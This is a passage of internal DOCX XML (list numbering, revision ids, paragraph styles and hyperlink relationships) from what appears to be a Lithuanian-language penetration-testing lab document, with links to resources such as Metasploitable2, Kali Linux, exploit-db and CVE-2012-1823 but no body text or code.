      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0427000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0427000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79E1062A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="471460EA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="644" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C6458EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F421D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8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="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700D3"/>
    <w:rsid w:val="00000C1F"/>
    <w:rsid w:val="00003ED4"/>
    <w:rsid w:val="00010B56"/>
    <w:rsid w:val="0002259B"/>
    <w:rsid w:val="00053DE1"/>
    <w:rsid w:val="000656C6"/>
    <w:rsid w:val="0008219C"/>
    <w:rsid w:val="000A0158"/>
    <w:rsid w:val="000A6E4B"/>
    <w:rsid w:val="000D0CB5"/>
    <w:rsid w:val="000E1E0A"/>
    <w:rsid w:val="00107FAE"/>
    <w:rsid w:val="00110871"/>
    <w:rsid w:val="00127DE1"/>
    <w:rsid w:val="001350E8"/>
    <w:rsid w:val="00137F82"/>
    <w:rsid w:val="00150E39"/>
    <w:rsid w:val="00153DE5"/>
    <w:rsid w:val="001572F3"/>
    <w:rsid w:val="00157A71"/>
    <w:rsid w:val="00165FC0"/>
    <w:rsid w:val="001700D3"/>
    <w:rsid w:val="00174B2E"/>
    <w:rsid w:val="00191F34"/>
    <w:rsid w:val="00193973"/>
    <w:rsid w:val="001A6B4A"/>
    <w:rsid w:val="001A6EFA"/>
    <w:rsid w:val="001B4BF9"/>
    <w:rsid w:val="001B59D1"/>
    <w:rsid w:val="001D1EE9"/>
    <w:rsid w:val="001E04C1"/>
    <w:rsid w:val="001E14A2"/>
    <w:rsid w:val="001E20DE"/>
    <w:rsid w:val="00210C18"/>
    <w:rsid w:val="0021333E"/>
    <w:rsid w:val="00215231"/>
    <w:rsid w:val="0021627E"/>
    <w:rsid w:val="00216483"/>
    <w:rsid w:val="00220388"/>
    <w:rsid w:val="0022763F"/>
    <w:rsid w:val="00241D66"/>
    <w:rsid w:val="0025697F"/>
    <w:rsid w:val="00261F30"/>
    <w:rsid w:val="00265437"/>
    <w:rsid w:val="00271587"/>
    <w:rsid w:val="0027438F"/>
    <w:rsid w:val="0027638B"/>
    <w:rsid w:val="00293DC1"/>
    <w:rsid w:val="002953AF"/>
    <w:rsid w:val="00297575"/>
    <w:rsid w:val="0029776A"/>
    <w:rsid w:val="002B4735"/>
    <w:rsid w:val="002C0AE4"/>
    <w:rsid w:val="002C27BF"/>
    <w:rsid w:val="002D069C"/>
    <w:rsid w:val="002D3576"/>
    <w:rsid w:val="002E6F70"/>
    <w:rsid w:val="002E71E0"/>
    <w:rsid w:val="002F7E0E"/>
    <w:rsid w:val="00300668"/>
    <w:rsid w:val="00306278"/>
    <w:rsid w:val="00313F48"/>
    <w:rsid w:val="00317951"/>
    <w:rsid w:val="00322B50"/>
    <w:rsid w:val="00323880"/>
    <w:rsid w:val="003243A5"/>
    <w:rsid w:val="00345679"/>
    <w:rsid w:val="0035629B"/>
    <w:rsid w:val="003663B5"/>
    <w:rsid w:val="003A005E"/>
    <w:rsid w:val="003A7E2A"/>
    <w:rsid w:val="003E0EE1"/>
    <w:rsid w:val="00403E85"/>
    <w:rsid w:val="00411543"/>
    <w:rsid w:val="00432466"/>
    <w:rsid w:val="004366F8"/>
    <w:rsid w:val="00437881"/>
    <w:rsid w:val="00442F10"/>
    <w:rsid w:val="004438EE"/>
    <w:rsid w:val="00452E7C"/>
    <w:rsid w:val="004660B5"/>
    <w:rsid w:val="00474658"/>
    <w:rsid w:val="00475599"/>
    <w:rsid w:val="00482A11"/>
    <w:rsid w:val="004916D1"/>
    <w:rsid w:val="0049653B"/>
    <w:rsid w:val="004B0F8F"/>
    <w:rsid w:val="004B1C5B"/>
    <w:rsid w:val="004B6A4E"/>
    <w:rsid w:val="004C6525"/>
    <w:rsid w:val="004E29E1"/>
    <w:rsid w:val="004E43D5"/>
    <w:rsid w:val="004F2A75"/>
    <w:rsid w:val="005028AD"/>
    <w:rsid w:val="00543F86"/>
    <w:rsid w:val="00550EF1"/>
    <w:rsid w:val="00552BF8"/>
    <w:rsid w:val="005547C9"/>
    <w:rsid w:val="00556142"/>
    <w:rsid w:val="005567DF"/>
    <w:rsid w:val="005757BE"/>
    <w:rsid w:val="0058196C"/>
    <w:rsid w:val="00582882"/>
    <w:rsid w:val="005A6008"/>
    <w:rsid w:val="005B4650"/>
    <w:rsid w:val="005C13BA"/>
    <w:rsid w:val="005C1CEF"/>
    <w:rsid w:val="005C441B"/>
    <w:rsid w:val="005C6B43"/>
    <w:rsid w:val="005D2981"/>
    <w:rsid w:val="005F0F99"/>
    <w:rsid w:val="005F2719"/>
    <w:rsid w:val="005F3D0B"/>
    <w:rsid w:val="005F4B44"/>
    <w:rsid w:val="0060146D"/>
    <w:rsid w:val="00607DC0"/>
    <w:rsid w:val="0061180B"/>
    <w:rsid w:val="006217B3"/>
    <w:rsid w:val="00624E55"/>
    <w:rsid w:val="00627339"/>
    <w:rsid w:val="00635B32"/>
    <w:rsid w:val="006474E6"/>
    <w:rsid w:val="006637C1"/>
    <w:rsid w:val="006747DF"/>
    <w:rsid w:val="006753E9"/>
    <w:rsid w:val="00677286"/>
    <w:rsid w:val="00697D3C"/>
    <w:rsid w:val="006B66B3"/>
    <w:rsid w:val="006D496C"/>
    <w:rsid w:val="006E3789"/>
    <w:rsid w:val="006E4990"/>
    <w:rsid w:val="006F17EE"/>
    <w:rsid w:val="006F501E"/>
    <w:rsid w:val="00700544"/>
    <w:rsid w:val="0070587D"/>
    <w:rsid w:val="00705AC5"/>
    <w:rsid w:val="00705BA0"/>
    <w:rsid w:val="00720625"/>
    <w:rsid w:val="00731B72"/>
    <w:rsid w:val="007453FB"/>
    <w:rsid w:val="00753948"/>
    <w:rsid w:val="00757A19"/>
    <w:rsid w:val="007652DB"/>
    <w:rsid w:val="007915F5"/>
    <w:rsid w:val="007938C6"/>
    <w:rsid w:val="007A2272"/>
    <w:rsid w:val="007A2AF3"/>
    <w:rsid w:val="007C52CB"/>
    <w:rsid w:val="007D090F"/>
    <w:rsid w:val="007E668B"/>
    <w:rsid w:val="00801E84"/>
    <w:rsid w:val="008028FE"/>
    <w:rsid w:val="008164B0"/>
    <w:rsid w:val="0083293E"/>
    <w:rsid w:val="008553C8"/>
    <w:rsid w:val="00872E6F"/>
    <w:rsid w:val="00876D9A"/>
    <w:rsid w:val="008801AB"/>
    <w:rsid w:val="00883399"/>
    <w:rsid w:val="008A64A0"/>
    <w:rsid w:val="008D280D"/>
    <w:rsid w:val="008D723B"/>
    <w:rsid w:val="008E1AD0"/>
    <w:rsid w:val="008F3A57"/>
    <w:rsid w:val="008F6494"/>
    <w:rsid w:val="009072FF"/>
    <w:rsid w:val="00920704"/>
    <w:rsid w:val="00931B29"/>
    <w:rsid w:val="00933806"/>
    <w:rsid w:val="009370E2"/>
    <w:rsid w:val="00944876"/>
    <w:rsid w:val="00945076"/>
    <w:rsid w:val="00951C59"/>
    <w:rsid w:val="00991E82"/>
    <w:rsid w:val="009A60FA"/>
    <w:rsid w:val="009A677B"/>
    <w:rsid w:val="009B48D2"/>
    <w:rsid w:val="009B7A36"/>
    <w:rsid w:val="009C6108"/>
    <w:rsid w:val="009D7CE0"/>
    <w:rsid w:val="009E0593"/>
    <w:rsid w:val="009F6AED"/>
    <w:rsid w:val="00A30420"/>
    <w:rsid w:val="00A447F1"/>
    <w:rsid w:val="00A56FF3"/>
    <w:rsid w:val="00A60A2B"/>
    <w:rsid w:val="00A64FE3"/>
    <w:rsid w:val="00A7617B"/>
    <w:rsid w:val="00A939C4"/>
    <w:rsid w:val="00AA344A"/>
    <w:rsid w:val="00AA5BBB"/>
    <w:rsid w:val="00AA5BCE"/>
    <w:rsid w:val="00AB24AD"/>
    <w:rsid w:val="00AB5A3B"/>
    <w:rsid w:val="00AB75F2"/>
    <w:rsid w:val="00AC101E"/>
    <w:rsid w:val="00AC44B6"/>
    <w:rsid w:val="00AE7B2B"/>
    <w:rsid w:val="00B0395B"/>
    <w:rsid w:val="00B137F8"/>
    <w:rsid w:val="00B14582"/>
    <w:rsid w:val="00B231E6"/>
    <w:rsid w:val="00B30A5C"/>
    <w:rsid w:val="00B310F2"/>
    <w:rsid w:val="00B3742B"/>
    <w:rsid w:val="00B423BA"/>
    <w:rsid w:val="00B4507D"/>
    <w:rsid w:val="00B5456E"/>
    <w:rsid w:val="00B55EF8"/>
    <w:rsid w:val="00B56E16"/>
    <w:rsid w:val="00B741AA"/>
    <w:rsid w:val="00B74A20"/>
    <w:rsid w:val="00B80B6B"/>
    <w:rsid w:val="00B820E7"/>
    <w:rsid w:val="00B958F8"/>
    <w:rsid w:val="00BA7EE1"/>
    <w:rsid w:val="00BC7949"/>
    <w:rsid w:val="00BD1775"/>
    <w:rsid w:val="00BD6073"/>
    <w:rsid w:val="00BD6D7B"/>
    <w:rsid w:val="00C1046D"/>
    <w:rsid w:val="00C17FBB"/>
    <w:rsid w:val="00C31E19"/>
    <w:rsid w:val="00C41334"/>
    <w:rsid w:val="00C46F3D"/>
    <w:rsid w:val="00C53644"/>
    <w:rsid w:val="00C55538"/>
    <w:rsid w:val="00C60AE6"/>
    <w:rsid w:val="00C7239F"/>
    <w:rsid w:val="00C729D5"/>
    <w:rsid w:val="00C763C4"/>
    <w:rsid w:val="00C77619"/>
    <w:rsid w:val="00C8249B"/>
    <w:rsid w:val="00C84FB8"/>
    <w:rsid w:val="00C87CD1"/>
    <w:rsid w:val="00CA5AC8"/>
    <w:rsid w:val="00CA78BB"/>
    <w:rsid w:val="00CC09C3"/>
    <w:rsid w:val="00CE1E79"/>
    <w:rsid w:val="00CF2D47"/>
    <w:rsid w:val="00D127F7"/>
    <w:rsid w:val="00D1755B"/>
    <w:rsid w:val="00D317E9"/>
    <w:rsid w:val="00D34404"/>
    <w:rsid w:val="00D3684E"/>
    <w:rsid w:val="00D759B5"/>
    <w:rsid w:val="00D77D22"/>
    <w:rsid w:val="00D8055A"/>
    <w:rsid w:val="00DC2336"/>
    <w:rsid w:val="00DC2381"/>
    <w:rsid w:val="00DD1945"/>
    <w:rsid w:val="00DD64EE"/>
    <w:rsid w:val="00DF08E2"/>
    <w:rsid w:val="00E03A92"/>
    <w:rsid w:val="00E055BB"/>
    <w:rsid w:val="00E17695"/>
    <w:rsid w:val="00E2617B"/>
    <w:rsid w:val="00E42F37"/>
    <w:rsid w:val="00E71C5B"/>
    <w:rsid w:val="00E733CA"/>
    <w:rsid w:val="00E7640B"/>
    <w:rsid w:val="00EA0E14"/>
    <w:rsid w:val="00EB7156"/>
    <w:rsid w:val="00EC38E2"/>
    <w:rsid w:val="00EC781D"/>
    <w:rsid w:val="00EC788D"/>
    <w:rsid w:val="00EC7D67"/>
    <w:rsid w:val="00ED0AFC"/>
    <w:rsid w:val="00ED1381"/>
    <w:rsid w:val="00EF3A6A"/>
    <w:rsid w:val="00EF602D"/>
    <w:rsid w:val="00F1495C"/>
    <w:rsid w:val="00F26E72"/>
    <w:rsid w:val="00F30DF7"/>
    <w:rsid w:val="00F45592"/>
    <w:rsid w:val="00F50BED"/>
    <w:rsid w:val="00F63E73"/>
    <w:rsid w:val="00F70B5A"/>
    <w:rsid w:val="00F75549"/>
    <w:rsid w:val="00FA3650"/>
    <w:rsid w:val="00FB037A"/>
    <w:rsid w:val="00FC5FC0"/>
    <w:rsid w:val="00FF542E"/>
    <w:rsid w:val="00FF56F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09E13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F8F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="001700D3"/>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8F3A57"/>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CC09C3"/>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G-01">
    <w:name w:val="MAG-01"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MAG-2">
    <w:name w:val="MAG-2"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="28"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MAG-3">
    <w:name w:val="MAG-3"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="1848"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="1848"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="001700D3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001700D3"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001700D3"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="spelle">
    <w:name w:val="spelle"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001700D3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001700D3"/>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1700D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700D3"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:eastAsia="Times New Roman" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00951C59"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:rsid w:val="00951C59"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndentChar">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent"/>
    <w:rsid w:val="00951C59"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CA78BB"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA78BB"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CA78BB"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="005F2719"/>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A677B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009A677B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009A677B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008F3A57"/>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CC09C3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CC09C3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="LightList-Accent1">
    <w:name w:val="Light List Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="61"/>
    <w:rsid w:val="005C441B"/>
    <w:rPr>
      <w:color w:val="262626"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>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876D9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mware.com/products/workstation-player.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://forums.unrealircd.com/viewtopic.php?t=6562" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sourceforge.net/projects/mutillidae/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sourceforge.net/projects/metasploitable/files/Metasploitable2/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.101/phpinfo.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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li.org/news/kali-linux-in-the-windows-app-store/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.pn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draw.io" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kali.org" 